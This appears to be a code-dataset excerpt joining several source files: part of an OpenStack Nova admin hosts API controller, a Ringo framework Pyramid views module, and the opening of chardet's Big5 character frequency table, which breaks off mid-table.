'service': 'consoleauth',
'zone': 'internal'},
{'host_name': 'network1.host.com',
'service': 'network',
'zone': 'internal'},
{'host_name': 'network2.host.com',
'service': 'network',
'zone': 'internal'},
{'host_name': 'compute1.host.com',
'service': 'compute',
'zone': 'nova'},
{'host_name': 'compute2.host.com',
'service': 'compute',
'zone': 'nova'},
{'host_name': 'sched1.host.com',
'service': 'scheduler',
'zone': 'internal'},
{'host_name': 'sched2.host.com',
'service': 'scheduler',
'zone': 'internal'},
{'host_name': 'vol1.host.com',
'service': 'volume',
'zone': 'internal'}]}
"""
context = req.environ['nova.context']
authorize(context)
filters = {'disabled': False}
zone = req.GET.get('zone', None)
if zone:
filters['availability_zone'] = zone
service = req.GET.get('service')
if service:
filters['topic'] = service
services = self.api.service_get_all(context, filters=filters,
set_zones=True)
hosts = []
for service in services:
hosts.append({'host_name': service['host'],
'service': service['topic'],
'zone': service['availability_zone']})
return {'hosts': hosts}
@extensions.expected_errors((400, 404, 501))
def update(self, req, id, body):
""":param body: example format {'host': {'status': 'enable',
'maintenance_mode': 'enable'}}
:returns:
"""
def read_enabled(orig_val, msg):
""":param orig_val: A string with either 'enable' or 'disable'. May
be surrounded by whitespace, and case doesn't
matter
:param msg: The message to be passed to HTTPBadRequest. A single
%s will be replaced with orig_val.
:returns: True for 'enable' and False for 'disable'
"""
val = orig_val.strip().lower()
if val == "enable":
return True
elif val == "disable":
return False
else:
raise webob.exc.HTTPBadRequest(explanation=msg % orig_val)
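# (annotation, not original code) read_enabled normalises case and
# whitespace before matching, e.g.:
#   read_enabled('  ENABLE ', msg)  -> True
#   read_enabled('disable', msg)    -> False
#   read_enabled('bogus', msg)      -> raises HTTPBadRequest(msg % 'bogus')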
context = req.environ['nova.context']
authorize(context)
# See what the user wants to 'update'
if not self.is_valid_body(body, 'host'):
raise webob.exc.HTTPBadRequest(
explanation=_("The request body invalid"))
params = dict([(k.strip().lower(), v)
for k, v in body['host'].iteritems()])
orig_status = status = params.pop('status', None)
orig_maint_mode = maint_mode = params.pop('maintenance_mode', None)
# Validate the request
if len(params) > 0:
# Some extra param was passed. Fail.
explanation = _("Invalid update setting: '%s'") % params.keys()[0]
raise webob.exc.HTTPBadRequest(explanation=explanation)
if orig_status is not None:
status = read_enabled(orig_status, _("Invalid status: '%s'"))
if orig_maint_mode is not None:
maint_mode = read_enabled(orig_maint_mode, _("Invalid mode: '%s'"))
if status is None and maint_mode is None:
explanation = _("'status' or 'maintenance_mode' needed for "
"host update")
raise webob.exc.HTTPBadRequest(explanation=explanation)
# Make the calls and merge the results
result = {'host': id}
if status is not None:
result['status'] = self._set_enabled_status(context, id, status)
if maint_mode is not None:
result['maintenance_mode'] = self._set_host_maintenance(context,
id,
maint_mode)
return {'host': result}
def _set_host_maintenance(self, context, host_name, mode=True):
"""Start/Stop host maintenance window. On start, it triggers
guest VM evacuation.
"""
LOG.audit(_("Putting host %(host_name)s in maintenance mode "
"%(mode)s."),
{'host_name': host_name, 'mode': mode})
try:
result = self.api.set_host_maintenance(context, host_name, mode)
except NotImplementedError:
msg = _("Virt driver does not implement host maintenance mode.")
raise webob.exc.HTTPNotImplemented(explanation=msg)
except exception.HostNotFound as e:
raise webob.exc.HTTPNotFound(explanation=e.format_message())
except exception.ComputeServiceUnavailable as e:
raise webob.exc.HTTPBadRequest(explanation=e.format_message())
if result not in ("on_maintenance", "off_maintenance"):
raise webob.exc.HTTPBadRequest(explanation=result)
return result
def _set_enabled_status(self, context, host_name, enabled):
"""Sets the specified host's ability to accept new instances.
:param enabled: a boolean - if False no new VMs will be able to start
on the host.
"""
if enabled:
LOG.audit(_("Enabling host %s.") % host_name)
else:
LOG.audit(_("Disabling host %s.") % host_name)
try:
result = self.api.set_host_enabled(context, host_name=host_name,
enabled=enabled)
except NotImplementedError:
msg = _("Virt driver does not implement host disabled status.")
raise webob.exc.HTTPNotImplemented(explanation=msg)
except exception.HostNotFound as e:
raise webob.exc.HTTPNotFound(explanation=e.format_message())
except exception.ComputeServiceUnavailable as e:
raise webob.exc.HTTPBadRequest(explanation=e.format_message())
if result not in ("enabled", "disabled"):
raise webob.exc.HTTPBadRequest(explanation=result)
return result
def _host_power_action(self, req, host_name, action):
"""Reboots, shuts down or powers up the host."""
context = req.environ['nova.context']
authorize(context)
try:
result = self.api.host_power_action(context, host_name=host_name,
action=action)
except NotImplementedError:
msg = _("Virt driver does not implement host power management.")
raise webob.exc.HTTPNotImplemented(explanation=msg)
except exception.HostNotFound as e:
raise webob.exc.HTTPNotFound(explanation=e.format_message())
except exception.ComputeServiceUnavailable as e:
raise webob.exc.HTTPBadRequest(explanation=e.format_message())
return {"host": {"host": host_name,
"power_action": result}}
@extensions.expected_errors((400, 404, 501))
def startup(self, req, id):
return self._host_power_action(req, host_name=id, action="startup")
@extensions.expected_errors((400, 404, 501))
def shutdown(self, req, id):
return self._host_power_action(req, host_name=id, action="shutdown")
@extensions.expected_errors((400, 404, 501))
def reboot(self, req, id):
return self._host_power_action(req, host_name=id, action="reboot")
@staticmethod
def _get_total_resources(host_name, compute_node):
return {'resource': {'host': host_name,
'project': '(total)',
'cpu': compute_node['vcpus'],
'memory_mb': compute_node['memory_mb'],
'disk_gb': compute_node['local_gb']}}
@staticmethod
def _get_used_now_resources(host_name, compute_node):
return {'resource': {'host': host_name,
'project': '(used_now)',
'cpu': compute_node['vcpus_used'],
'memory_mb': compute_node['memory_mb_used'],
'disk_gb': compute_node['local_gb_used']}}
@staticmethod
def _get_resource_totals_from_instances(host_name, instances):
cpu_sum = 0
mem_sum = 0
hdd_sum = 0
for instance in instances:
cpu_sum += instance['vcpus']
mem_sum += instance['memory_mb']
hdd_sum += instance['root_gb'] + instance['ephemeral_gb']
return {'resource': {'host': host_name,
'project': '(used_max)',
'cpu': cpu_sum,
'memory_mb': mem_sum,
'disk_gb': hdd_sum}}
@staticmethod
def _get_resources_by_project(host_name, instances):
# Gather usage resources per project
project_map = {}
for instance in instances:
resource = project_map.setdefault(instance['project_id'],
{'host': host_name,
'project': instance['project_id'],
'cpu': 0,
'memory_mb': 0,
'disk_gb': 0})
resource['cpu'] += instance['vcpus']
resource['memory_mb'] += instance['memory_mb']
resource['disk_gb'] += (instance['root_gb'] +
instance['ephemeral_gb'])
return project_map
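# Aggregation sketch (made-up instances, not original code): rows for the
# same project collapse into one entry via setdefault.
#
#   insts = [{'project_id': 'p1', 'vcpus': 2, 'memory_mb': 512,
#             'root_gb': 10, 'ephemeral_gb': 0},
#            {'project_id': 'p1', 'vcpus': 1, 'memory_mb': 256,
#             'root_gb': 5, 'ephemeral_gb': 5}]
#   HostController._get_resources_by_project('node1', insts)
#   # -> {'p1': {'host': 'node1', 'project': 'p1',
#   #            'cpu': 3, 'memory_mb': 768, 'disk_gb': 20}}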
@extensions.expected_errors((403, 404))
def show(self, req, id):
"""Shows the physical/usage resource given by hosts.
:param id: hostname
:returns: expected to use HostShowTemplate.
ex.::
{'host': [{'resource': D}, ...]}
D: {'host': 'hostname', 'project': 'admin',
'cpu': 1, 'memory_mb': 2048, 'disk_gb': 30}
"""
context = req.environ['nova.context']
authorize(context)
host_name = id
try:
service = self.api.service_get_by_compute_host(context, host_name)
except exception.ComputeHostNotFound as e:
raise webob.exc.HTTPNotFound(explanation=e.format_message())
except exception.AdminRequired:
# TODO(Alex Xu): The authorization is done by policy, so the
# db layer check is unnecessary and should be removed.
msg = _("Describe-resource is admin only functionality")
raise webob.exc.HTTPForbidden(explanation=msg)
compute_node = service['compute_node']
instances = self.api.instance_get_all_by_host(context, host_name)
resources = [self._get_total_resources(host_name, compute_node)]
resources.append(self._get_used_now_resources(host_name,
compute_node))
resources.append(self._get_resource_totals_from_instances(host_name,
instances))
by_proj_resources = self._get_resources_by_project(host_name,
instances)
for resource in by_proj_resources.itervalues():
resources.append({'resource': resource})
return {'host': resources}
class Hosts(extensions.V3APIExtensionBase):
"""Admin-only host administration."""
name = "Hosts"
alias = ALIAS
version = 1
def get_resources(self):
resources = [extensions.ResourceExtension('os-hosts',
HostController(),
member_actions={"startup": "GET", "shutdown": "GET",
"reboot": "GET"})]
return resources
def get_controller_extensions(self):
return []
| apache-2.0 |
ringo-framework/ringo | ringo/views/home.py | 3 | 1347 | import pkg_resources
from pyramid.view import view_config
from ringo.lib.helpers import (
get_ringo_version,
get_app_version,
get_app_name,
get_app_title
)
from ringo.lib.renderer import (
DTListRenderer
)
@view_config(route_name='home', renderer='/index.mako')
def index_view(request):
values = {}
return values
@view_config(route_name='about', renderer='/about.mako')
def about_view(request):
values = {}
values['app_title'] = get_app_title()
return values
@view_config(route_name='contact', renderer='/contact.mako')
def contact_view(request):
return {}
@view_config(route_name='version', renderer='/version.mako')
def version_view(request):
# Fetch the versions of some packages (Ringo, formbar, sqlalchemy, pyramid)
values = {}
formbar_pkg = pkg_resources.get_distribution('formbar')
sqla_pkg = pkg_resources.get_distribution('sqlalchemy')
pyramid_pkg = pkg_resources.get_distribution('pyramid')
values['app_title'] = get_app_title()
values['app_version'] = get_app_version()
values['app_name'] = get_app_name()
values['ringo_version'] = get_ringo_version()
values['formbar_version'] = formbar_pkg.version
values['sqlalchemy_version'] = sqla_pkg.version
values['pyramid_version'] = pyramid_pkg.version
return values
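# (annotation, not original code) pkg_resources reads the metadata of the
# installed distributions, so the page always reflects the versions active
# in the current environment, e.g.:
#
#   pkg_resources.get_distribution('pyramid').version  # -> e.g. '1.5.1'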
| gpl-2.0 |
mottosso/be | be/vendor/requests/packages/chardet/big5freq.py | 3133 | 82594 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Communicator client code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
# Big5 frequency table
# by Taiwan's Mandarin Promotion Council
# <http://www.edu.tw:81/mandr/>
#
# 128 --> 0.42261
# 256 --> 0.57851
# 512 --> 0.74851
# 1024 --> 0.89384
# 2048 --> 0.97583
#
# Ideal Distribution Ratio = 0.74851/(1-0.74851) = 2.98
# Random Distribution Ratio = 512/(5401-512) = 0.105
#
# Typical Distribution Ratio is about 25% of the Ideal one, still much higher than RDR
BIG5_TYPICAL_DISTRIBUTION_RATIO = 0.75
# Char to FreqOrder table
BIG5_TABLE_SIZE = 5376
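# Illustrative sketch (not part of chardet itself): the char distribution
# analyser maps each two-byte Big5 character to an index ("order") and
# counts how many land among the 512 most frequent entries; the resulting
# hit ratio is weighed against BIG5_TYPICAL_DISTRIBUTION_RATIO above.
#
#   def is_frequent(order):
#       return order < BIG5_TABLE_SIZE and Big5CharToFreqOrder[order] < 512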
Big5CharToFreqOrder = (
1,1801,1506, 255,1431, 198, 9, 82, 6,5008, 177, 202,3681,1256,2821, 110, # 16
3814, 33,3274, 261, 76, 44,2114, 16,2946,2187,1176, 659,3971, 26,3451,2653, # 32
1198,3972,3350,4202, 410,2215, 302, 590, 361,1964, 8, 204, 58,4510,5009,1932, # 48
63,5010,5011, 317,1614, 75, 222, 159,4203,2417,1480,5012,3555,3091, 224,2822, # 64
3682, 3, 10,3973,1471, 29,2787,1135,2866,1940, 873, 130,3275,1123, 312,5013, # 80
4511,2052, 507, 252, 682,5014, 142,1915, 124, 206,2947, 34,3556,3204, 64, 604, # 96
5015,2501,1977,1978, 155,1991, 645, 641,1606,5016,3452, 337, 72, 406,5017, 80, # 112
630, 238,3205,1509, 263, 939,1092,2654, 756,1440,1094,3453, 449, 69,2987, 591, # 128
179,2096, 471, 115,2035,1844, 60, 50,2988, 134, 806,1869, 734,2036,3454, 180, # 144
995,1607, 156, 537,2907, 688,5018, 319,1305, 779,2145, 514,2379, 298,4512, 359, # 160
2502, 90,2716,1338, 663, 11, 906,1099,2553, 20,2441, 182, 532,1716,5019, 732, # 176
1376,4204,1311,1420,3206, 25,2317,1056, 113, 399, 382,1950, 242,3455,2474, 529, # 192
3276, 475,1447,3683,5020, 117, 21, 656, 810,1297,2300,2334,3557,5021, 126,4205, # 208
706, 456, 150, 613,4513, 71,1118,2037,4206, 145,3092, 85, 835, 486,2115,1246, # 224
1426, 428, 727,1285,1015, 800, 106, 623, 303,1281,5022,2128,2359, 347,3815, 221, # 240
3558,3135,5023,1956,1153,4207, 83, 296,1199,3093, 192, 624, 93,5024, 822,1898, # 256
2823,3136, 795,2065, 991,1554,1542,1592, 27, 43,2867, 859, 139,1456, 860,4514, # 272
437, 712,3974, 164,2397,3137, 695, 211,3037,2097, 195,3975,1608,3559,3560,3684, # 288
3976, 234, 811,2989,2098,3977,2233,1441,3561,1615,2380, 668,2077,1638, 305, 228, # 304
1664,4515, 467, 415,5025, 262,2099,1593, 239, 108, 300, 200,1033, 512,1247,2078, # 320
5026,5027,2176,3207,3685,2682, 593, 845,1062,3277, 88,1723,2038,3978,1951, 212, # 336
266, 152, 149, 468,1899,4208,4516, 77, 187,5028,3038, 37, 5,2990,5029,3979, # 352
5030,5031, 39,2524,4517,2908,3208,2079, 55, 148, 74,4518, 545, 483,1474,1029, # 368
1665, 217,1870,1531,3138,1104,2655,4209, 24, 172,3562, 900,3980,3563,3564,4519, # 384
32,1408,2824,1312, 329, 487,2360,2251,2717, 784,2683, 4,3039,3351,1427,1789, # 400
188, 109, 499,5032,3686,1717,1790, 888,1217,3040,4520,5033,3565,5034,3352,1520, # 416
3687,3981, 196,1034, 775,5035,5036, 929,1816, 249, 439, 38,5037,1063,5038, 794, # 432
3982,1435,2301, 46, 178,3278,2066,5039,2381,5040, 214,1709,4521, 804, 35, 707, # 448
324,3688,1601,2554, 140, 459,4210,5041,5042,1365, 839, 272, 978,2262,2580,3456, # 464
2129,1363,3689,1423, 697, 100,3094, 48, 70,1231, 495,3139,2196,5043,1294,5044, # 480
2080, 462, 586,1042,3279, 853, 256, 988, 185,2382,3457,1698, 434,1084,5045,3458, # 496
314,2625,2788,4522,2335,2336, 569,2285, 637,1817,2525, 757,1162,1879,1616,3459, # 512
287,1577,2116, 768,4523,1671,2868,3566,2526,1321,3816, 909,2418,5046,4211, 933, # 528
3817,4212,2053,2361,1222,4524, 765,2419,1322, 786,4525,5047,1920,1462,1677,2909, # 544
1699,5048,4526,1424,2442,3140,3690,2600,3353,1775,1941,3460,3983,4213, 309,1369, # 560
1130,2825, 364,2234,1653,1299,3984,3567,3985,3986,2656, 525,1085,3041, 902,2001, # 576
1475, 964,4527, 421,1845,1415,1057,2286, 940,1364,3141, 376,4528,4529,1381, 7, # 592
2527, 983,2383, 336,1710,2684,1846, 321,3461, 559,1131,3042,2752,1809,1132,1313, # 608
265,1481,1858,5049, 352,1203,2826,3280, 167,1089, 420,2827, 776, 792,1724,3568, # 624
4214,2443,3281,5050,4215,5051, 446, 229, 333,2753, 901,3818,1200,1557,4530,2657, # 640
1921, 395,2754,2685,3819,4216,1836, 125, 916,3209,2626,4531,5052,5053,3820,5054, # 656
5055,5056,4532,3142,3691,1133,2555,1757,3462,1510,2318,1409,3569,5057,2146, 438, # 672
2601,2910,2384,3354,1068, 958,3043, 461, 311,2869,2686,4217,1916,3210,4218,1979, # 688
383, 750,2755,2627,4219, 274, 539, 385,1278,1442,5058,1154,1965, 384, 561, 210, # 704
98,1295,2556,3570,5059,1711,2420,1482,3463,3987,2911,1257, 129,5060,3821, 642, # 720
523,2789,2790,2658,5061, 141,2235,1333, 68, 176, 441, 876, 907,4220, 603,2602, # 736
710, 171,3464, 404, 549, 18,3143,2398,1410,3692,1666,5062,3571,4533,2912,4534, # 752
5063,2991, 368,5064, 146, 366, 99, 871,3693,1543, 748, 807,1586,1185, 22,2263, # 768
379,3822,3211,5065,3212, 505,1942,2628,1992,1382,2319,5066, 380,2362, 218, 702, # 784
1818,1248,3465,3044,3572,3355,3282,5067,2992,3694, 930,3283,3823,5068, 59,5069, # 800
585, 601,4221, 497,3466,1112,1314,4535,1802,5070,1223,1472,2177,5071, 749,1837, # 816
690,1900,3824,1773,3988,1476, 429,1043,1791,2236,2117, 917,4222, 447,1086,1629, # 832
5072, 556,5073,5074,2021,1654, 844,1090, 105, 550, 966,1758,2828,1008,1783, 686, # 848
1095,5075,2287, 793,1602,5076,3573,2603,4536,4223,2948,2302,4537,3825, 980,2503, # 864
544, 353, 527,4538, 908,2687,2913,5077, 381,2629,1943,1348,5078,1341,1252, 560, # 880
3095,5079,3467,2870,5080,2054, 973, 886,2081, 143,4539,5081,5082, 157,3989, 496, # 896
4224, 57, 840, 540,2039,4540,4541,3468,2118,1445, 970,2264,1748,1966,2082,4225, # 912
3144,1234,1776,3284,2829,3695, 773,1206,2130,1066,2040,1326,3990,1738,1725,4226, # 928
279,3145, 51,1544,2604, 423,1578,2131,2067, 173,4542,1880,5083,5084,1583, 264, # 944
610,3696,4543,2444, 280, 154,5085,5086,5087,1739, 338,1282,3096, 693,2871,1411, # 960
1074,3826,2445,5088,4544,5089,5090,1240, 952,2399,5091,2914,1538,2688, 685,1483, # 976
4227,2475,1436, 953,4228,2055,4545, 671,2400, 79,4229,2446,3285, 608, 567,2689, # 992
3469,4230,4231,1691, 393,1261,1792,2401,5092,4546,5093,5094,5095,5096,1383,1672, # 1008
3827,3213,1464, 522,1119, 661,1150, 216, 675,4547,3991,1432,3574, 609,4548,2690, # 1024
2402,5097,5098,5099,4232,3045, 0,5100,2476, 315, 231,2447, 301,3356,4549,2385, # 1040
5101, 233,4233,3697,1819,4550,4551,5102, 96,1777,1315,2083,5103, 257,5104,1810, # 1056
3698,2718,1139,1820,4234,2022,1124,2164,2791,1778,2659,5105,3097, 363,1655,3214, # 1072
5106,2993,5107,5108,5109,3992,1567,3993, 718, 103,3215, 849,1443, 341,3357,2949, # 1088
1484,5110,1712, 127, 67, 339,4235,2403, 679,1412, 821,5111,5112, 834, 738, 351, # 1104
2994,2147, 846, 235,1497,1881, 418,1993,3828,2719, 186,1100,2148,2756,3575,1545, # 1120
1355,2950,2872,1377, 583,3994,4236,2581,2995,5113,1298,3699,1078,2557,3700,2363, # 1136
78,3829,3830, 267,1289,2100,2002,1594,4237, 348, 369,1274,2197,2178,1838,4552, # 1152
1821,2830,3701,2757,2288,2003,4553,2951,2758, 144,3358, 882,4554,3995,2759,3470, # 1168
4555,2915,5114,4238,1726, 320,5115,3996,3046, 788,2996,5116,2831,1774,1327,2873, # 1184
3997,2832,5117,1306,4556,2004,1700,3831,3576,2364,2660, 787,2023, 506, 824,3702, # 1200
534, 323,4557,1044,3359,2024,1901, 946,3471,5118,1779,1500,1678,5119,1882,4558, # 1216
165, 243,4559,3703,2528, 123, 683,4239, 764,4560, 36,3998,1793, 589,2916, 816, # 1232
626,1667,3047,2237,1639,1555,1622,3832,3999,5120,4000,2874,1370,1228,1933, 891, # 1248
2084,2917, 304,4240,5121, 292,2997,2720,3577, 691,2101,4241,1115,4561, 118, 662, # 1264
5122, 611,1156, 854,2386,1316,2875, 2, 386, 515,2918,5123,5124,3286, 868,2238, # 1280
1486, 855,2661, 785,2216,3048,5125,1040,3216,3578,5126,3146, 448,5127,1525,5128, # 1296
2165,4562,5129,3833,5130,4242,2833,3579,3147, 503, 818,4001,3148,1568, 814, 676, # 1312
1444, 306,1749,5131,3834,1416,1030, 197,1428, 805,2834,1501,4563,5132,5133,5134, # 1328
1994,5135,4564,5136,5137,2198, 13,2792,3704,2998,3149,1229,1917,5138,3835,2132, # 1344
5139,4243,4565,2404,3580,5140,2217,1511,1727,1120,5141,5142, 646,3836,2448, 307, # 1360
5143,5144,1595,3217,5145,5146,5147,3705,1113,1356,4002,1465,2529,2530,5148, 519, # 1376
5149, 128,2133, 92,2289,1980,5150,4003,1512, 342,3150,2199,5151,2793,2218,1981, # 1392
3360,4244, 290,1656,1317, 789, 827,2365,5152,3837,4566, 562, 581,4004,5153, 401, # 1408
4567,2252, 94,4568,5154,1399,2794,5155,1463,2025,4569,3218,1944,5156, 828,1105, # 1424
4245,1262,1394,5157,4246, 605,4570,5158,1784,2876,5159,2835, 819,2102, 578,2200, # 1440
2952,5160,1502, 436,3287,4247,3288,2836,4005,2919,3472,3473,5161,2721,2320,5162, # 1456
5163,2337,2068, 23,4571, 193, 826,3838,2103, 699,1630,4248,3098, 390,1794,1064, # 1472
3581,5164,1579,3099,3100,1400,5165,4249,1839,1640,2877,5166,4572,4573, 137,4250, # 1488
598,3101,1967, 780, 104, 974,2953,5167, 278, 899, 253, 402, 572, 504, 493,1339, # 1504
5168,4006,1275,4574,2582,2558,5169,3706,3049,3102,2253, 565,1334,2722, 863, 41, # 1520
5170,5171,4575,5172,1657,2338, 19, 463,2760,4251, 606,5173,2999,3289,1087,2085, # 1536
1323,2662,3000,5174,1631,1623,1750,4252,2691,5175,2878, 791,2723,2663,2339, 232, # 1552
2421,5176,3001,1498,5177,2664,2630, 755,1366,3707,3290,3151,2026,1609, 119,1918, # 1568
3474, 862,1026,4253,5178,4007,3839,4576,4008,4577,2265,1952,2477,5179,1125, 817, # 1584
4254,4255,4009,1513,1766,2041,1487,4256,3050,3291,2837,3840,3152,5180,5181,1507, # 1600
5182,2692, 733, 40,1632,1106,2879, 345,4257, 841,2531, 230,4578,3002,1847,3292, # 1616
3475,5183,1263, 986,3476,5184, 735, 879, 254,1137, 857, 622,1300,1180,1388,1562, # 1632
4010,4011,2954, 967,2761,2665,1349, 592,2134,1692,3361,3003,1995,4258,1679,4012, # 1648
1902,2188,5185, 739,3708,2724,1296,1290,5186,4259,2201,2202,1922,1563,2605,2559, # 1664
1871,2762,3004,5187, 435,5188, 343,1108, 596, 17,1751,4579,2239,3477,3709,5189, # 1680
4580, 294,3582,2955,1693, 477, 979, 281,2042,3583, 643,2043,3710,2631,2795,2266, # 1696
1031,2340,2135,2303,3584,4581, 367,1249,2560,5190,3585,5191,4582,1283,3362,2005, # 1712
240,1762,3363,4583,4584, 836,1069,3153, 474,5192,2149,2532, 268,3586,5193,3219, # 1728
1521,1284,5194,1658,1546,4260,5195,3587,3588,5196,4261,3364,2693,1685,4262, 961, # 1744
1673,2632, 190,2006,2203,3841,4585,4586,5197, 570,2504,3711,1490,5198,4587,2633, # 1760
3293,1957,4588, 584,1514, 396,1045,1945,5199,4589,1968,2449,5200,5201,4590,4013, # 1776
619,5202,3154,3294, 215,2007,2796,2561,3220,4591,3221,4592, 763,4263,3842,4593, # 1792
5203,5204,1958,1767,2956,3365,3712,1174, 452,1477,4594,3366,3155,5205,2838,1253, # 1808
2387,2189,1091,2290,4264, 492,5206, 638,1169,1825,2136,1752,4014, 648, 926,1021, # 1824
1324,4595, 520,4596, 997, 847,1007, 892,4597,3843,2267,1872,3713,2405,1785,4598, # 1840
1953,2957,3103,3222,1728,4265,2044,3714,4599,2008,1701,3156,1551, 30,2268,4266, # 1856
5207,2027,4600,3589,5208, 501,5209,4267, 594,3478,2166,1822,3590,3479,3591,3223, # 1872
829,2839,4268,5210,1680,3157,1225,4269,5211,3295,4601,4270,3158,2341,5212,4602, # 1888
4271,5213,4015,4016,5214,1848,2388,2606,3367,5215,4603, 374,4017, 652,4272,4273, # 1904
375,1140, 798,5216,5217,5218,2366,4604,2269, 546,1659, 138,3051,2450,4605,5219, # 1920
2254, 612,1849, 910, 796,3844,1740,1371, 825,3845,3846,5220,2920,2562,5221, 692, # 1936
444,3052,2634, 801,4606,4274,5222,1491, 244,1053,3053,4275,4276, 340,5223,4018, # 1952
1041,3005, 293,1168, 87,1357,5224,1539, 959,5225,2240, 721, 694,4277,3847, 219, # 1968
1478, 644,1417,3368,2666,1413,1401,1335,1389,4019,5226,5227,3006,2367,3159,1826, # 1984
730,1515, 184,2840, 66,4607,5228,1660,2958, 246,3369, 378,1457, 226,3480, 975, # 2000
4020,2959,1264,3592, 674, 696,5229, 163,5230,1141,2422,2167, 713,3593,3370,4608, # 2016
4021,5231,5232,1186, 15,5233,1079,1070,5234,1522,3224,3594, 276,1050,2725, 758, # 2032
1126, 653,2960,3296,5235,2342, 889,3595,4022,3104,3007, 903,1250,4609,4023,3481, # 2048
3596,1342,1681,1718, 766,3297, 286, 89,2961,3715,5236,1713,5237,2607,3371,3008, # 2064
5238,2962,2219,3225,2880,5239,4610,2505,2533, 181, 387,1075,4024, 731,2190,3372, # 2080
5240,3298, 310, 313,3482,2304, 770,4278, 54,3054, 189,4611,3105,3848,4025,5241, # 2096
1230,1617,1850, 355,3597,4279,4612,3373, 111,4280,3716,1350,3160,3483,3055,4281, # 2112
2150,3299,3598,5242,2797,4026,4027,3009, 722,2009,5243,1071, 247,1207,2343,2478, # 2128
1378,4613,2010, 864,1437,1214,4614, 373,3849,1142,2220, 667,4615, 442,2763,2563, # 2144
3850,4028,1969,4282,3300,1840, 837, 170,1107, 934,1336,1883,5244,5245,2119,4283, # 2160
2841, 743,1569,5246,4616,4284, 582,2389,1418,3484,5247,1803,5248, 357,1395,1729, # 2176
3717,3301,2423,1564,2241,5249,3106,3851,1633,4617,1114,2086,4285,1532,5250, 482, # 2192
2451,4618,5251,5252,1492, 833,1466,5253,2726,3599,1641,2842,5254,1526,1272,3718, # 2208
4286,1686,1795, 416,2564,1903,1954,1804,5255,3852,2798,3853,1159,2321,5256,2881, # 2224
4619,1610,1584,3056,2424,2764, 443,3302,1163,3161,5257,5258,4029,5259,4287,2506, # 2240
3057,4620,4030,3162,2104,1647,3600,2011,1873,4288,5260,4289, 431,3485,5261, 250, # 2256
97, 81,4290,5262,1648,1851,1558, 160, 848,5263, 866, 740,1694,5264,2204,2843, # 2272
3226,4291,4621,3719,1687, 950,2479, 426, 469,3227,3720,3721,4031,5265,5266,1188, # 2288
424,1996, 861,3601,4292,3854,2205,2694, 168,1235,3602,4293,5267,2087,1674,4622, # 2304
3374,3303, 220,2565,1009,5268,3855, 670,3010, 332,1208, 717,5269,5270,3603,2452, # 2320
4032,3375,5271, 513,5272,1209,2882,3376,3163,4623,1080,5273,5274,5275,5276,2534, # 2336
3722,3604, 815,1587,4033,4034,5277,3605,3486,3856,1254,4624,1328,3058,1390,4035, # 2352
1741,4036,3857,4037,5278, 236,3858,2453,3304,5279,5280,3723,3859,1273,3860,4625, # 2368
5281, 308,5282,4626, 245,4627,1852,2480,1307,2583, 430, 715,2137,2454,5283, 270, # 2384
199,2883,4038,5284,3606,2727,1753, 761,1754, 725,1661,1841,4628,3487,3724,5285, # 2400
5286, 587, 14,3305, 227,2608, 326, 480,2270, 943,2765,3607, 291, 650,1884,5287, # 2416
1702,1226, 102,1547, 62,3488, 904,4629,3489,1164,4294,5288,5289,1224,1548,2766, # 2432
391, 498,1493,5290,1386,1419,5291,2056,1177,4630, 813, 880,1081,2368, 566,1145, # 2448
4631,2291,1001,1035,2566,2609,2242, 394,1286,5292,5293,2069,5294, 86,1494,1730, # 2464
4039, 491,1588, 745, 897,2963, 843,3377,4040,2767,2884,3306,1768, 998,2221,2070, # 2480
397,1827,1195,1970,3725,3011,3378, 284,5295,3861,2507,2138,2120,1904,5296,4041, # 2496
2151,4042,4295,1036,3490,1905, 114,2567,4296, 209,1527,5297,5298,2964,2844,2635, # 2512
2390,2728,3164, 812,2568,5299,3307,5300,1559, 737,1885,3726,1210, 885, 28,2695, # 2528
3608,3862,5301,4297,1004,1780,4632,5302, 346,1982,2222,2696,4633,3863,1742, 797, # 2544
1642,4043,1934,1072,1384,2152, 896,4044,3308,3727,3228,2885,3609,5303,2569,1959, # 2560
4634,2455,1786,5304,5305,5306,4045,4298,1005,1308,3728,4299,2729,4635,4636,1528, # 2576
2610, 161,1178,4300,1983, 987,4637,1101,4301, 631,4046,1157,3229,2425,1343,1241, # 2592
1016,2243,2570, 372, 877,2344,2508,1160, 555,1935, 911,4047,5307, 466,1170, 169, # 2608
1051,2921,2697,3729,2481,3012,1182,2012,2571,1251,2636,5308, 992,2345,3491,1540, # 2624
2730,1201,2071,2406,1997,2482,5309,4638, 528,1923,2191,1503,1874,1570,2369,3379, # 2640
3309,5310, 557,1073,5311,1828,3492,2088,2271,3165,3059,3107, 767,3108,2799,4639, # 2656
1006,4302,4640,2346,1267,2179,3730,3230, 778,4048,3231,2731,1597,2667,5312,4641, # 2672
5313,3493,5314,5315,5316,3310,2698,1433,3311, 131, 95,1504,4049, 723,4303,3166, # 2688
1842,3610,2768,2192,4050,2028,2105,3731,5317,3013,4051,1218,5318,3380,3232,4052, # 2704
4304,2584, 248,1634,3864, 912,5319,2845,3732,3060,3865, 654, 53,5320,3014,5321, # 2720
1688,4642, 777,3494,1032,4053,1425,5322, 191, 820,2121,2846, 971,4643, 931,3233, # 2736
135, 664, 783,3866,1998, 772,2922,1936,4054,3867,4644,2923,3234, 282,2732, 640, # 2752
1372,3495,1127, 922, 325,3381,5323,5324, 711,2045,5325,5326,4055,2223,2800,1937, # 2768
4056,3382,2224,2255,3868,2305,5327,4645,3869,1258,3312,4057,3235,2139,2965,4058, # 2784
4059,5328,2225, 258,3236,4646, 101,1227,5329,3313,1755,5330,1391,3314,5331,2924, # 2800
2057, 893,5332,5333,5334,1402,4305,2347,5335,5336,3237,3611,5337,5338, 878,1325, # 2816
1781,2801,4647, 259,1385,2585, 744,1183,2272,4648,5339,4060,2509,5340, 684,1024, # 2832
